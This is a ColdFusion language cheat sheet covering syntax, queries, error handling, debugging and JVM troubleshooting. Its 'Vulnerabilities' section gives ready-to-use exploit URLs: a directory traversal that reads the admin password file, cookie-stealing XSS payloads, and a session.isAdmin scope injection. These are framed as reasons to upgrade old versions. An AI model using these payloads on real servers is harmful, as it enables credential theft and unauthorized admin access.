github
CFCS
CFCS

join the dark side

Contribute

ColdFusion Cheat Sheet

A reference for CF goodness.

Buy me a cup of coffeeDonate a Cup of Coffee ❤️

Set variables

Use cfset to create a variable (if it doesn't exist) and assign it a value. You can also use it to call functions.

Current time

<cfset currentTime = now() />

Regular string

<cfset name = "Archi" />

Integer

<cfset age = 29 />

Concatenate variable and string

<cfset todayDate = "Today is: #now()#" />
<cfset greeting = "Hello " & name />

Array

<cfset dataArray = [dateFormat(now(), "short"), dateFormat(dateadd('d',1,now()), "short"), "Me", 42] />

Data structure

<cfset dictionary = { today = dateFormat(now(), "short"), tomorrow = dateFormat(dateadd('d', 1, now()), "short"), who = "Me", the_answer_to_life_and_everything_else = 42 } />

Arrays

Arrays don't start from 0 like in every other language instead start from 1

Create array literal

<cfset someThings = ["Boca", "Futbol", 42] />

Constructor

<cfset sameArray = arrayNew(1) />

Adding elements in an specific index

<cfset someThings[4] = "Ruby on Rails" />

Appending

<cfset ArrayAppend(someThings, "Destiny") />

Looping over the array

<cfloop array = "#someThings#" index = "thing">
    <cfoutput>#thing#</cfoutput>
</cfloop>

Loops

There are several different types of for and while loops in ColdFusion.
For more info please see the docs for cfloop.

FOR Loop

for (i=1;i LTE ArrayLen(array);i=i+1) {
	WriteOutput(array[i]);
}

While Loop

x = 0;
while (x LT 5) {
	x = x + 1;
	WriteOutput(x);
}
//OUTPUTS 12345

Do While Loop

x = 0;
do {
 x = x+1;
 WriteOutput(x);
} while (x LTE 0);
// OUTPUTS 1

FOR IN Loop (Structure)

struct = StructNew();
struct.one = "1";
struct.two = "2";
for (key in struct) {
	WriteOutput(key);
}
//OUTPUTS onetwo

FOR IN Loop (Array)

cars = ["Ford","Dodge"];
for (car in cars) {
	WriteOutput(car);
}
//OUTPUTS FordDodge

FOR IN Loop (Query)

cars = QueryNew("make,model",
	"cf_sql_varchar,cf_sql_varchar",
	[["Ford", "T"],["Dodge","30"]]);
for (car in cars) {
	WriteOutput("Model " & car.model);
}
//OUTPUTS Model TModel 30

Structures

This are like dictionaries in Python or hashes in Ruby

Create structure literal

<cfset aGuy = {} />
<cfset batman = {
    "first_name" = "Bruno",
    "last_name" = "Diaz",
    "age" = 42
} />

Constructor

<cfset aGuy = structNew() />

Adding elements with brackets

<cfset aGuy["first_name"] = "Ezequiel" />
<cfset aGuy["last_name"] = "Lopez" />

Adding elements with dot notation

<cfset aGuy.age = 29 />
<cfset aGuy.height = "5' 11\"" />

Looping over the structure

<cfloop collection = "aGuy" item = "data">
    <cfoutput>#aGuy[data]#: #data#</cfoutput>
</cfloop>

Queries

Use SQL in coldfusion to retrieve data from a database or enter data in it

Query

var queryOptions = { datasource: "appMain" };
var data = queryExecute(
  "SELECT * FROM users", {}, queryOptions
);

Allocate query result into variable & retrieve info

<cfquery name="firstQ" datasource="tsdata.ts24">
    SELECT * FROM TestTable
</cfquery>

Looping over the Query

<cfoutput>
    <cfloop query="#firstQ#">
        <p><i>myDataAlfa: </i>#firstQ.myDataAlfa# <i>myDataInt: </i>#firstQ.myDataInt#</p>
    </cfloop>
    
    <!--- Extra data to get from the query --->
    <p>#firstQ.columnlist#</p>
    <p>#firstQ.recordcount#</p>
</cfoutput>

Logging

Logging stuff

Clear Log

var logDir = expandPath( "/logs/" );
var logs = directoryList(
  path = logDir,
  listInfo = "name",
  filter = "*.log",
  type = "file",
  recurse = "false"
);
for( var log in logs ){
  var fullPath = logDir & log ;
  if( fileExists( fullPath ) ){
    fileDelete( fullPath );
  }
}

LogBox

component {
  // ...
  function onError( exception ){
   // uLogging error with logbox...
    writeOutput( "Writing the error in log file.." );
    logger.error(
        "An error occured: #exception.message# #exception.detail#"
        exception
    );

    // error page
    include "views/error.cfm";
  }
}

Security

Security-related settings for Application.cfc file

Lock down APP

// Application.cfc
component {
  this.name = "myApp";
  this.blockedExtForFileUpload = "*";
  this.scriptProtect					 = "all";
  this.sessioncookie = {
    httpOnly: true,
    secure  : true
  };
}

Error Handling

ColdFusion provides a variety of tools to customize error information and handle errors when they occur.

Try / Catch / Throw / Finally / Rethrow

try {
	throw(message="Oops", detail="xyz");
} catch (any e) {
	WriteOutput("Error: " & e.message);
	rethrow;
	
} finally {
	WriteOutput("I run even if no error");
}

OnError Exception

  public function onError(required exception, required string eventName)
  {
    var factory = new App.ExceptionFactory();
    var e = factory.getNewException(arguments.eventName, arguments.exception);
    if (e.logError()) {
      var loggingFile = new App.SomeLoggingCfc(arguments.eventName, arguments.exception);
      loggingFile.commitLog();
    }
    if (e.debugError()) {}
    e.throwException();
  } 
  public ExceptionFactory function getNewException(required string eventName, required exception)
  {
    return new "App.#exception.type#"(argumentCollection = arguments);
  } 
  public boolean function logError() {}
  public boolean function debugError() {}
  public function throwException() {}

Output CF Error details without CFDump

<cftry>
   ...
<cfcatch>
   <cf_OutputCFCatch CFCatch="#CFCatch#" />
</cfcatch>
</cftry>

Debugging

You can use CFML tags and functions to display or hide debugging and tracing information.

Control Debugging Output

<cfsetting showDebugOutput="No">

Show Query exec.time

<cfquery name="TestQuery" datasource="cfexample" debug>
SELECT * FROM TestTable
</cfquery>

Log Values to MyAppSilentTrace.log

<cfif IsDebugMode()>
<cflog file="MyAppSilentTrace" text="Page: #cgi.script_name#,
completed query MyDBQuery; Query Execution time:
#cfquery.ExecutionTime# Status: #Application.status#">
</cfif>

Comments

ColdFusion comments have a similar format to HTML comments but use three dash characters instead of two.

Single line comment

<!--- This is a ColdFusion Comment. Browsers do not receive it. --->

Single line comment

mojo = 1; //THIS IS A COMMENT

Multiline comment

/* This is a comment
	that can span
	multiple lines
*/

Vulnerabilities

ColdFusion had a lot of security vulnerabilities in the past, so stop using older versions!

# CVE-2010-2861 - Adobe ColdFusion Unspecified Directory Traversal Vulnerability
detailed information about the exploitation of this vulnerability: http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
1. open file in browser
http://[server:port]/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
2. copy the hashed password
#Fri Feb 07 05:48:45 PST 2020 rdspassword= password=42DABCDFADADASASAS4891539FASDA11CA5 encrypted=true
3. compare with rainbow tables
https://www.dcode.fr/sha1-hash
# CVE-2009-1872 - Adobe ColdFusion Server Query String Cross-Site Scripting
detailed information about the exploitation of this vulnerability: https://www.securityfocus.com/bid/36046/info
1. open file in browser
http://www.example.com:8500/CFIDE/componentutils/componentdetail.cfm?component=<body%20onload=alert(document.cookie)>
http://www.example.com:8500/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=%3Cbody%20onload=alert(document.cookie)%3E
http://www.example.com:8500/CFIDE/componentutils/cfcexplorer.cfc?method=%3Cbody%20onload=alert(document.cookie)%3E
# Adobe ColdFusion Server Scope Injection
detailed information about the exploitation of this vulnerability: https://www.petefreitag.com/item/834.cfm
1. open any action (that checks session.isAdmin) in browser
http://www.example.com:8500/CFIDE/componentutils/componentdetail.cfm
2. append the following to the url
?session.isAdmin=1

Tricks

Tips & Tricks on becoming ColdFusion Pro!

Find the Java Version Used by ColdFusion or Railo

<cfoutput>#CreateObject("java", "java.lang.System").getProperty("java.version")#</cfoutput>

Per-Application ColdFusion Mappings

<cfset this.mappings["/test"]="c:\inetpub\wwwroot\test">

Restart a ColdFusion Application

<cfset ApplicationStop() />
<cflocation url="index.cfm" addtoken="false" />

Lower Session Timeouts for Bots and Spiders

#in Application.cfm
<cfif StructKeyExists(cookie, "cfid") or StructKeyExists(cookie, "jsessionid")>
<cfset REQUEST.sessionTimeout = CreateTimeSpan(0,0,30,0) />
<cfelse>
 <cfset REQUEST.sessionTimeout = CreateTimeSpan(0,0,0,2) />
</cfif>

#REQUEST.sessionTimeout variable in cfapplication tag

<cfapplication name="myawesomeapp"
     sessionmanagement="Yes"
     sessiontimeout="#REQUEST.sessionTimeout#">

Troubleshooting

Below are some of the most common issues that I've faced with while working with older CF versions.

Wrong time zone in ColdFusion


PROBLEM: ColdFusion now() function is reporting different time than that of a server.

CAUSE: ColdFusion relies on Java and uses the time zone within the Java Virtual Machine (JVM) that ColdFusion runs on.
 

SOLUTION: Add the following JVM Argument

-Duser.timezone=Europe/Belgrade
*Where Europe/Belgrade is your timezone ID

ColdFusion Application keeps dying


PROBLEM: ColdFusion application breaks with the following error: Out‐of‐ Memory error (OOME)

CAUSE:-XX:PermSize & -XX:MaxPermSize are used to set size for Permanent Generation (where compiled classes and JSP pages are kept). If this space is full, it triggers a Full Garbage Collection and if that fails to expand the Permanent Space the JVM will crash.

SOLUTION: Add the following JVM Argument

-XX:MaxPermSize=512m
*Where 512m stands for 512MB